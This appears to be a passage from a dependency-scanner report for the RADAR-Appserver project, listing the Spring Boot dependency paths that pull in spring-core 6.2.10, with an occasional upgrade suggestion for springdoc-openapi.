Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver#268b45f15ecddfcf495a62859d1ace0c5e16017a › org.springframework.boot:spring-boot-starter-data-jpa@4.1.0-M4 › org.springframework.boot:spring-boot-data-jpa@4.1.0-M4 › org.springframework.data:spring-data-jpa@4.1.0-M2 › org.springframework:spring-orm@7.0.6 › org.springframework:spring-beans@6.2.10 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver#268b45f15ecddfcf495a62859d1ace0c5e16017a › org.springframework.boot:spring-boot-starter-security@4.1.0-M4 › org.springframework.boot:spring-boot-security@4.1.0-M4 › org.springframework.security:spring-security-config@7.1.0-M3 › org.springframework.security:spring-security-core@7.1.0-M3 › org.springframework:spring-beans@6.2.10 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver#268b45f15ecddfcf495a62859d1ace0c5e16017a › org.springframework.boot:spring-boot-starter-security@4.1.0-M4 › org.springframework.boot:spring-boot-security@4.1.0-M4 › org.springframework.security:spring-security-web@7.1.0-M3 › org.springframework.security:spring-security-core@7.1.0-M3 › org.springframework:spring-beans@6.2.10 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver#268b45f15ecddfcf495a62859d1ace0c5e16017a › org.springframework.boot:spring-boot-starter-actuator@4.1.0-M4 › org.springframework.boot:spring-boot-health@4.1.0-M4 › org.springframework.boot:spring-boot@4.1.0-M4 › org.springframework:spring-context@6.0.6 › org.springframework:spring-aop@6.2.10 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver#268b45f15ecddfcf495a62859d1ace0c5e16017a › org.springframework.boot:spring-boot-starter-data-jpa@4.1.0-M4 › org.springframework.boot:spring-boot-jdbc@4.1.0-M4 › org.springframework.boot:spring-boot@4.1.0-M4 › org.springframework:spring-context@6.0.6 › org.springframework:spring-aop@6.2.10 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver#268b45f15ecddfcf495a62859d1ace0c5e16017a › org.springframework.boot:spring-boot-starter-mail@4.1.0-M4 › org.springframework.boot:spring-boot-mail@4.1.0-M4 › org.springframework.boot:spring-boot@4.1.0-M4 › org.springframework:spring-context@6.0.6 › org.springframework:spring-aop@6.2.10 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver#268b45f15ecddfcf495a62859d1ace0c5e16017a › org.springframework.boot:spring-boot-starter-security@4.1.0-M4 › org.springframework.boot:spring-boot-security@4.1.0-M4 › org.springframework.boot:spring-boot@4.1.0-M4 › org.springframework:spring-context@6.0.6 › org.springframework:spring-aop@6.2.10 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver#268b45f15ecddfcf495a62859d1ace0c5e16017a › org.springframework.boot:spring-boot-starter-web@4.1.0-M4 › org.springframework.boot:spring-boot-http-converter@4.1.0-M4 › org.springframework.boot:spring-boot@4.1.0-M4 › org.springframework:spring-context@6.0.6 › org.springframework:spring-aop@6.2.10 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver#268b45f15ecddfcf495a62859d1ace0c5e16017a › org.springdoc:springdoc-openapi-starter-webmvc-ui@2.7.0 › org.springdoc:springdoc-openapi-starter-webmvc-api@2.7.0 › org.springframework:spring-webmvc@7.0.6 › org.springframework:spring-context@6.0.6 › org.springframework:spring-aop@6.2.10 › org.springframework:spring-core@6.2.10Remediation: Upgrade to org.springdoc:springdoc-openapi-starter-webmvc-ui@3.0.0.
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver#268b45f15ecddfcf495a62859d1ace0c5e16017a › org.springframework.boot:spring-boot-starter-web@4.1.0-M4 › org.springframework.boot:spring-boot-webmvc@4.1.0-M4 › org.springframework:spring-webmvc@7.0.6 › org.springframework:spring-context@6.0.6 › org.springframework:spring-aop@6.2.10 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver#268b45f15ecddfcf495a62859d1ace0c5e16017a › org.springframework.boot:spring-boot-starter-data-jpa@4.1.0-M4 › org.springframework.boot:spring-boot-data-jpa@4.1.0-M4 › org.springframework.data:spring-data-jpa@4.1.0-M2 › org.springframework:spring-context@6.0.6 › org.springframework:spring-aop@6.2.10 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver#268b45f15ecddfcf495a62859d1ace0c5e16017a › org.springframework.boot:spring-boot-starter-mail@4.1.0-M4 › org.springframework.boot:spring-boot-mail@4.1.0-M4 › org.springframework:spring-context-support@7.0.6 › org.springframework:spring-context@6.0.6 › org.springframework:spring-aop@6.2.10 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver#268b45f15ecddfcf495a62859d1ace0c5e16017a › org.springframework.boot:spring-boot-starter-quartz@4.1.0-M4 › org.springframework.boot:spring-boot-quartz@4.1.0-M4 › org.springframework:spring-context-support@7.0.6 › org.springframework:spring-context@6.0.6 › org.springframework:spring-aop@6.2.10 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver#268b45f15ecddfcf495a62859d1ace0c5e16017a › org.springframework.boot:spring-boot-starter-security@4.1.0-M4 › org.springframework.boot:spring-boot-security@4.1.0-M4 › org.springframework.security:spring-security-config@7.1.0-M3 › org.springframework:spring-context@6.0.6 › org.springframework:spring-aop@6.2.10 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver#268b45f15ecddfcf495a62859d1ace0c5e16017a › org.springframework.boot:spring-boot-starter-security@4.1.0-M4 › org.springframework.boot:spring-boot-security@4.1.0-M4 › org.springframework.security:spring-security-web@7.1.0-M3 › org.springframework:spring-context@6.0.6 › org.springframework:spring-aop@6.2.10 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver#268b45f15ecddfcf495a62859d1ace0c5e16017a › org.springframework.boot:spring-boot-starter-security@4.1.0-M4 › org.springframework.boot:spring-boot-security@4.1.0-M4 › org.springframework.security:spring-security-config@7.1.0-M3 › org.springframework.security:spring-security-core@7.1.0-M3 › org.springframework:spring-aop@6.2.10 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver#268b45f15ecddfcf495a62859d1ace0c5e16017a › org.springframework.boot:spring-boot-starter-security@4.1.0-M4 › org.springframework.boot:spring-boot-security@4.1.0-M4 › org.springframework.security:spring-security-web@7.1.0-M3 › org.springframework.security:spring-security-core@7.1.0-M3 › org.springframework:spring-aop@6.2.10 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver#268b45f15ecddfcf495a62859d1ace0c5e16017a › org.springframework.boot:spring-boot-starter-actuator@4.1.0-M4 › org.springframework.boot:spring-boot-health@4.1.0-M4 › org.springframework.boot:spring-boot@4.1.0-M4 › org.springframework:spring-context@6.0.6 › org.springframework:spring-expression@6.0.6 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver#268b45f15ecddfcf495a62859d1ace0c5e16017a › org.springframework.boot:spring-boot-starter-data-jpa@4.1.0-M4 › org.springframework.boot:spring-boot-jdbc@4.1.0-M4 › org.springframework.boot:spring-boot@4.1.0-M4 › org.springframework:spring-context@6.0.6 › org.springframework:spring-expression@6.0.6 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver#268b45f15ecddfcf495a62859d1ace0c5e16017a › org.springframework.boot:spring-boot-starter-mail@4.1.0-M4 › org.springframework.boot:spring-boot-mail@4.1.0-M4 › org.springframework.boot:spring-boot@4.1.0-M4 › org.springframework:spring-context@6.0.6 › org.springframework:spring-expression@6.0.6 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver#268b45f15ecddfcf495a62859d1ace0c5e16017a › org.springframework.boot:spring-boot-starter-security@4.1.0-M4 › org.springframework.boot:spring-boot-security@4.1.0-M4 › org.springframework.boot:spring-boot@4.1.0-M4 › org.springframework:spring-context@6.0.6 › org.springframework:spring-expression@6.0.6 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver#268b45f15ecddfcf495a62859d1ace0c5e16017a › org.springframework.boot:spring-boot-starter-web@4.1.0-M4 › org.springframework.boot:spring-boot-http-converter@4.1.0-M4 › org.springframework.boot:spring-boot@4.1.0-M4 › org.springframework:spring-context@6.0.6 › org.springframework:spring-expression@6.0.6 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver#268b45f15ecddfcf495a62859d1ace0c5e16017a › org.springdoc:springdoc-openapi-starter-webmvc-ui@2.7.0 › org.springdoc:springdoc-openapi-starter-webmvc-api@2.7.0 › org.springframework:spring-webmvc@7.0.6 › org.springframework:spring-context@6.0.6 › org.springframework:spring-expression@6.0.6 › org.springframework:spring-core@6.2.10Remediation: Upgrade to org.springdoc:springdoc-openapi-starter-webmvc-ui@3.0.0.
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver#268b45f15ecddfcf495a62859d1ace0c5e16017a › org.springframework.boot:spring-boot-starter-web@4.1.0-M4 › org.springframework.boot:spring-boot-webmvc@4.1.0-M4 › org.springframework:spring-webmvc@7.0.6 › org.springframework:spring-context@6.0.6 › org.springframework:spring-expression@6.0.6 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver#268b45f15ecddfcf495a62859d1ace0c5e16017a › org.springframework.boot:spring-boot-starter-data-jpa@4.1.0-M4 › org.springframework.boot:spring-boot-data-jpa@4.1.0-M4 › org.springframework.data:spring-data-jpa@4.1.0-M2 › org.springframework:spring-context@6.0.6 › org.springframework:spring-expression@6.0.6 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver#268b45f15ecddfcf495a62859d1ace0c5e16017a › org.springframework.boot:spring-boot-starter-mail@4.1.0-M4 › org.springframework.boot:spring-boot-mail@4.1.0-M4 › org.springframework:spring-context-support@7.0.6 › org.springframework:spring-context@6.0.6 › org.springframework:spring-expression@6.0.6 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver#268b45f15ecddfcf495a62859d1ace0c5e16017a › org.springframework.boot:spring-boot-starter-quartz@4.1.0-M4 › org.springframework.boot:spring-boot-quartz@4.1.0-M4 › org.springframework:spring-context-support@7.0.6 › org.springframework:spring-context@6.0.6 › org.springframework:spring-expression@6.0.6 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver#268b45f15ecddfcf495a62859d1ace0c5e16017a › org.springframework.boot:spring-boot-starter-security@4.1.0-M4 › org.springframework.boot:spring-boot-security@4.1.0-M4 › org.springframework.security:spring-security-config@7.1.0-M3 › org.springframework:spring-context@6.0.6 › org.springframework:spring-expression@6.0.6 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver#268b45f15ecddfcf495a62859d1ace0c5e16017a › org.springframework.boot:spring-boot-starter-security@4.1.0-M4 › org.springframework.boot:spring-boot-security@4.1.0-M4 › org.springframework.security:spring-security-web@7.1.0-M3 › org.springframework:spring-context@6.0.6 › org.springframework:spring-expression@6.0.6 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver#268b45f15ecddfcf495a62859d1ace0c5e16017a › org.springframework.boot:spring-boot-starter-security@4.1.0-M4 › org.springframework.boot:spring-boot-security@4.1.0-M4 › org.springframework.security:spring-security-config@7.1.0-M3 › org.springframework.security:spring-security-core@7.1.0-M3 › org.springframework:spring-expression@6.0.6 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver#268b45f15ecddfcf495a62859d1ace0c5e16017a › org.springframework.boot:spring-boot-starter-security@4.1.0-M4 › org.springframework.boot:spring-boot-security@4.1.0-M4 › org.springframework.security:spring-security-web@7.1.0-M3 › org.springframework.security:spring-security-core@7.1.0-M3 › org.springframework:spring-expression@6.0.6 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver#268b45f15ecddfcf495a62859d1ace0c5e16017a › org.springframework.boot:spring-boot-starter-actuator@4.1.0-M4 › org.springframework.boot:spring-boot-actuator-autoconfigure@4.1.0-M4 › org.springframework.boot:spring-boot-autoconfigure@4.1.0-M4 › org.springframework.boot:spring-boot@4.1.0-M4 › org.springframework:spring-context@6.0.6 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver#268b45f15ecddfcf495a62859d1ace0c5e16017a › org.springframework.boot:spring-boot-starter-actuator@4.1.0-M4 › org.springframework.boot:spring-boot-starter@4.1.0-M4 › org.springframework.boot:spring-boot-autoconfigure@4.1.0-M4 › org.springframework.boot:spring-boot@4.1.0-M4 › org.springframework:spring-context@6.0.6 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver#268b45f15ecddfcf495a62859d1ace0c5e16017a › org.springframework.boot:spring-boot-starter-data-jpa@4.1.0-M4 › org.springframework.boot:spring-boot-starter@4.1.0-M4 › org.springframework.boot:spring-boot-autoconfigure@4.1.0-M4 › org.springframework.boot:spring-boot@4.1.0-M4 › org.springframework:spring-context@6.0.6 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver#268b45f15ecddfcf495a62859d1ace0c5e16017a › org.springframework.boot:spring-boot-starter-mail@4.1.0-M4 › org.springframework.boot:spring-boot-starter@4.1.0-M4 › org.springframework.boot:spring-boot-autoconfigure@4.1.0-M4 › org.springframework.boot:spring-boot@4.1.0-M4 › org.springframework:spring-context@6.0.6 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver#268b45f15ecddfcf495a62859d1ace0c5e16017a › org.springframework.boot:spring-boot-starter-quartz@4.1.0-M4 › org.springframework.boot:spring-boot-starter@4.1.0-M4 › org.springframework.boot:spring-boot-autoconfigure@4.1.0-M4 › org.springframework.boot:spring-boot@4.1.0-M4 › org.springframework:spring-context@6.0.6 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver#268b45f15ecddfcf495a62859d1ace0c5e16017a › org.springframework.boot:spring-boot-starter-security@4.1.0-M4 › org.springframework.boot:spring-boot-starter@4.1.0-M4 › org.springframework.boot:spring-boot-autoconfigure@4.1.0-M4 › org.springframework.boot:spring-boot@4.1.0-M4 › org.springframework:spring-context@6.0.6 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver#268b45f15ecddfcf495a62859d1ace0c5e16017a › org.springframework.boot:spring-boot-starter-actuator@4.1.0-M4 › org.springframework.boot:spring-boot-actuator-autoconfigure@4.1.0-M4 › org.springframework.boot:spring-boot-actuator@4.1.0-M4 › org.springframework.boot:spring-boot@4.1.0-M4 › org.springframework:spring-context@6.0.6 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver#268b45f15ecddfcf495a62859d1ace0c5e16017a › org.springframework.boot:spring-boot-starter-actuator@4.1.0-M4 › org.springframework.boot:spring-boot-starter-micrometer-metrics@4.1.0-M4 › org.springframework.boot:spring-boot-micrometer-metrics@4.1.0-M4 › org.springframework.boot:spring-boot@4.1.0-M4 › org.springframework:spring-context@6.0.6 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver#268b45f15ecddfcf495a62859d1ace0c5e16017a › org.springframework.boot:spring-boot-starter-data-jpa@4.1.0-M4 › org.springframework.boot:spring-boot-data-jpa@4.1.0-M4 › org.springframework.boot:spring-boot-data-commons@4.1.0-M4 › org.springframework.boot:spring-boot@4.1.0-M4 › org.springframework:spring-context@6.0.6 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver#268b45f15ecddfcf495a62859d1ace0c5e16017a › org.springframework.boot:spring-boot-starter-data-jpa@4.1.0-M4 › org.springframework.boot:spring-boot-jdbc@4.1.0-M4 › org.springframework.boot:spring-boot-sql@4.1.0-M4 › org.springframework.boot:spring-boot@4.1.0-M4 › org.springframework:spring-context@6.0.6 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver#268b45f15ecddfcf495a62859d1ace0c5e16017a › org.springframework.boot:spring-boot-starter-data-jpa@4.1.0-M4 › org.springframework.boot:spring-boot-jdbc@4.1.0-M4 › org.springframework.boot:spring-boot-transaction@4.1.0-M4 › org.springframework.boot:spring-boot@4.1.0-M4 › org.springframework:spring-context@6.0.6 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver#268b45f15ecddfcf495a62859d1ace0c5e16017a › org.springframework.boot:spring-boot-starter-quartz@4.1.0-M4 › org.springframework.boot:spring-boot-quartz@4.1.0-M4 › org.springframework.boot:spring-boot-transaction@4.1.0-M4 › org.springframework.boot:spring-boot@4.1.0-M4 › org.springframework:spring-context@6.0.6 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver#268b45f15ecddfcf495a62859d1ace0c5e16017a › org.springframework.boot:spring-boot-starter-data-jpa@4.1.0-M4 › org.springframework.boot:spring-boot-starter-jdbc@4.1.0-M4 › org.springframework.boot:spring-boot-jdbc@4.1.0-M4 › org.springframework.boot:spring-boot@4.1.0-M4 › org.springframework:spring-context@6.0.6 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver#268b45f15ecddfcf495a62859d1ace0c5e16017a › org.springframework.boot:spring-boot-starter-web@4.1.0-M4 › org.springframework.boot:spring-boot-webmvc@4.1.0-M4 › org.springframework.boot:spring-boot-http-converter@4.1.0-M4 › org.springframework.boot:spring-boot@4.1.0-M4 › org.springframework:spring-context@6.0.6 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver#268b45f15ecddfcf495a62859d1ace0c5e16017a › org.springframework.boot:spring-boot-starter-web@4.1.0-M4 › org.springframework.boot:spring-boot-starter-jackson@4.1.0-M4 › org.springframework.boot:spring-boot-jackson@4.1.0-M4 › org.springframework.boot:spring-boot@4.1.0-M4 › org.springframework:spring-context@6.0.6 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver#268b45f15ecddfcf495a62859d1ace0c5e16017a › org.springframework.boot:spring-boot-starter-web@4.1.0-M4 › org.springframework.boot:spring-boot-webmvc@4.1.0-M4 › org.springframework.boot:spring-boot-servlet@4.1.0-M4 › org.springframework.boot:spring-boot@4.1.0-M4 › org.springframework:spring-context@6.0.6 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver#268b45f15ecddfcf495a62859d1ace0c5e16017a › org.springframework.boot:spring-boot-starter-security@4.1.0-M4 › org.springframework.boot:spring-boot-security@4.1.0-M4 › org.springframework.security:spring-security-config@7.1.0-M3 › org.springframework.security:spring-security-core@7.1.0-M3 › org.springframework:spring-context@6.0.6 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver#268b45f15ecddfcf495a62859d1ace0c5e16017a › org.springframework.boot:spring-boot-starter-security@4.1.0-M4 › org.springframework.boot:spring-boot-security@4.1.0-M4 › org.springframework.security:spring-security-web@7.1.0-M3 › org.springframework.security:spring-security-core@7.1.0-M3 › org.springframework:spring-context@6.0.6 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver#268b45f15ecddfcf495a62859d1ace0c5e16017a › org.springframework.boot:spring-boot-starter-web@4.1.0-M4 › org.springframework.boot:spring-boot-starter-tomcat@4.1.0-M4 › org.springframework.boot:spring-boot-tomcat@4.1.0-M4 › org.springframework.boot:spring-boot-web-server@4.1.0-M4 › org.springframework:spring-web@6.0.6 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver#268b45f15ecddfcf495a62859d1ace0c5e16017a › org.springframework.boot:spring-boot-starter-web@4.1.0-M4 › org.springframework.boot:spring-boot-starter-tomcat@4.1.0-M4 › org.springframework.boot:spring-boot-starter-tomcat-runtime@4.1.0-M4 › org.springframework.boot:spring-boot-web-server@4.1.0-M4 › org.springframework:spring-web@6.0.6 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver#268b45f15ecddfcf495a62859d1ace0c5e16017a › org.springdoc:springdoc-openapi-starter-webmvc-ui@2.7.0 › org.springdoc:springdoc-openapi-starter-webmvc-api@2.7.0 › org.springdoc:springdoc-openapi-starter-common@2.7.0 › org.springframework.boot:spring-boot-autoconfigure@4.1.0-M4 › org.springframework.boot:spring-boot@4.1.0-M4 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver#268b45f15ecddfcf495a62859d1ace0c5e16017a › org.springframework.boot:spring-boot-starter-actuator@4.1.0-M4 › org.springframework.boot:spring-boot-starter-micrometer-metrics@4.1.0-M4 › org.springframework.boot:spring-boot-starter@4.1.0-M4 › org.springframework.boot:spring-boot-autoconfigure@4.1.0-M4 › org.springframework.boot:spring-boot@4.1.0-M4 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver#268b45f15ecddfcf495a62859d1ace0c5e16017a › org.springframework.boot:spring-boot-starter-data-jpa@4.1.0-M4 › org.springframework.boot:spring-boot-starter-jdbc@4.1.0-M4 › org.springframework.boot:spring-boot-starter@4.1.0-M4 › org.springframework.boot:spring-boot-autoconfigure@4.1.0-M4 › org.springframework.boot:spring-boot@4.1.0-M4 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver#268b45f15ecddfcf495a62859d1ace0c5e16017a › org.springframework.boot:spring-boot-starter-web@4.1.0-M4 › org.springframework.boot:spring-boot-starter-jackson@4.1.0-M4 › org.springframework.boot:spring-boot-starter@4.1.0-M4 › org.springframework.boot:spring-boot-autoconfigure@4.1.0-M4 › org.springframework.boot:spring-boot@4.1.0-M4 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver#268b45f15ecddfcf495a62859d1ace0c5e16017a › org.springframework.boot:spring-boot-starter-web@4.1.0-M4 › org.springframework.boot:spring-boot-starter-tomcat@4.1.0-M4 › org.springframework.boot:spring-boot-starter@4.1.0-M4 › org.springframework.boot:spring-boot-autoconfigure@4.1.0-M4 › org.springframework.boot:spring-boot@4.1.0-M4 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver#268b45f15ecddfcf495a62859d1ace0c5e16017a › org.springframework.boot:spring-boot-starter-actuator@4.1.0-M4 › org.springframework.boot:spring-boot-starter-micrometer-metrics@4.1.0-M4 › org.springframework.boot:spring-boot-micrometer-metrics@4.1.0-M4 › org.springframework.boot:spring-boot-micrometer-observation@4.1.0-M4 › org.springframework.boot:spring-boot@4.1.0-M4 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver#268b45f15ecddfcf495a62859d1ace0c5e16017a › org.springframework.boot:spring-boot-starter-data-jpa@4.1.0-M4 › org.springframework.boot:spring-boot-data-jpa@4.1.0-M4 › org.springframework.boot:spring-boot-data-commons@4.1.0-M4 › org.springframework.boot:spring-boot-persistence@4.1.0-M4 › org.springframework.boot:spring-boot@4.1.0-M4 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver#268b45f15ecddfcf495a62859d1ace0c5e16017a › org.springframework.boot:spring-boot-starter-data-jpa@4.1.0-M4 › org.springframework.boot:spring-boot-jdbc@4.1.0-M4 › org.springframework.boot:spring-boot-transaction@4.1.0-M4 › org.springframework.boot:spring-boot-persistence@4.1.0-M4 › org.springframework.boot:spring-boot@4.1.0-M4 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver#268b45f15ecddfcf495a62859d1ace0c5e16017a › org.springframework.boot:spring-boot-starter-quartz@4.1.0-M4 › org.springframework.boot:spring-boot-quartz@4.1.0-M4 › org.springframework.boot:spring-boot-transaction@4.1.0-M4 › org.springframework.boot:spring-boot-persistence@4.1.0-M4 › org.springframework.boot:spring-boot@4.1.0-M4 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver#268b45f15ecddfcf495a62859d1ace0c5e16017a › org.springframework.boot:spring-boot-starter-data-jpa@4.1.0-M4 › org.springframework.boot:spring-boot-starter-jdbc@4.1.0-M4 › org.springframework.boot:spring-boot-jdbc@4.1.0-M4 › org.springframework.boot:spring-boot-sql@4.1.0-M4 › org.springframework.boot:spring-boot@4.1.0-M4 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver#268b45f15ecddfcf495a62859d1ace0c5e16017a › org.springframework.boot:spring-boot-starter-data-jpa@4.1.0-M4 › org.springframework.boot:spring-boot-starter-jdbc@4.1.0-M4 › org.springframework.boot:spring-boot-jdbc@4.1.0-M4 › org.springframework.boot:spring-boot-transaction@4.1.0-M4 › org.springframework.boot:spring-boot@4.1.0-M4 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver#268b45f15ecddfcf495a62859d1ace0c5e16017a › org.springframework.boot:spring-boot-starter-web@4.1.0-M4 › org.springframework.boot:spring-boot-starter-tomcat@4.1.0-M4 › org.springframework.boot:spring-boot-tomcat@4.1.0-M4 › org.springframework.boot:spring-boot-web-server@4.1.0-M4 › org.springframework.boot:spring-boot@4.1.0-M4 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver#268b45f15ecddfcf495a62859d1ace0c5e16017a › org.springframework.boot:spring-boot-starter-web@4.1.0-M4 › org.springframework.boot:spring-boot-starter-tomcat@4.1.0-M4 › org.springframework.boot:spring-boot-starter-tomcat-runtime@4.1.0-M4 › org.springframework.boot:spring-boot-web-server@4.1.0-M4 › org.springframework.boot:spring-boot@4.1.0-M4 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver#268b45f15ecddfcf495a62859d1ace0c5e16017a › org.springframework.boot:spring-boot-starter-data-jpa@4.1.0-M4 › org.springframework.boot:spring-boot-data-jpa@4.1.0-M4 › org.springframework.boot:spring-boot-data-commons@4.1.0-M4 › org.springframework.boot:spring-boot-persistence@4.1.0-M4 › org.springframework:spring-tx@7.0.6 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver#268b45f15ecddfcf495a62859d1ace0c5e16017a › org.springframework.boot:spring-boot-starter-data-jpa@4.1.0-M4 › org.springframework.boot:spring-boot-jdbc@4.1.0-M4 › org.springframework.boot:spring-boot-transaction@4.1.0-M4 › org.springframework.boot:spring-boot-persistence@4.1.0-M4 › org.springframework:spring-tx@7.0.6 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver#268b45f15ecddfcf495a62859d1ace0c5e16017a › org.springframework.boot:spring-boot-starter-quartz@4.1.0-M4 › org.springframework.boot:spring-boot-quartz@4.1.0-M4 › org.springframework.boot:spring-boot-transaction@4.1.0-M4 › org.springframework.boot:spring-boot-persistence@4.1.0-M4 › org.springframework:spring-tx@7.0.6 › org.springframework:spring-core@6.2.10
-
Introduced through: RADAR-base/RADAR-Appserver@RADAR-base/RADAR-Appserver#268b45f15ecddfcf495a62859d1ace0c5e16017a › org.springframework.boot:spring-boot-starter-data-jpa@4.1.0-M4 › org.springframework.boot:spring-boot-starter-jdbc@4.1.0-M4 › org.springframework.boot:spring-boot-jdbc@4.1.0-M4 › org.springframework.boot:spring-boot-transaction@4.1.0-M4 › org.springframework:spring-tx@7.0.6 › org.springframework:spring-core@6.2.10
-
